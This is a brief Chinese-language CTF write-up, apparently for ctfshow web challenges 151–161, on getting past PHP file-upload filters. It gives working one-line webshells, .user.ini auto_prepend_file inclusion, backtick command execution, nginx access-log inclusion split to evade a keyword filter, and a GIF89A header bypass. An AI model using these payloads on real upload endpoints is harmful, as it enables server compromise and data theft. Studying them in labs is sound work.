• WEB151

抓包改個名字即可

• WEB152

同上,隨便傳個圖片馬

• WEB153

考點是.user.ini

注意上傳圖片目錄下有個index.php 即/upload/index.php

首先上傳一個1.png圖片馬

上傳auto_prepend_file = 1.png 的.user.ini

這樣.user.ini所在目錄會全部的檔案包含1.png

• WEB154

同上過濾了php

一句話木馬可以寫成：<?= ?>等價於echo

• WEB155

同上

• WEB156

同上

過濾了[] 可以用{}

<?=eval($_POST{attack});?>

• WEB157

繼續過濾了{}和；

那就直接不用一句話木馬，直接system('cat flag.ph*')

• WEB 158/159

同上，用<?= `cat ../f*`?>

• WEB160

過濾了括號和反引號，所以不好上傳指令

所以用.user.ini 包含圖片

圖片包含日誌

<?=include"/var/lo"."g/nginx/access.lo"."g"?>

這裡不能.user.ini直接包含日誌，原因上面說了

另外這裡過濾了log所以要拼接一下

• WEB161

對檔案頭檢測，

GIF89A用來繞過檢測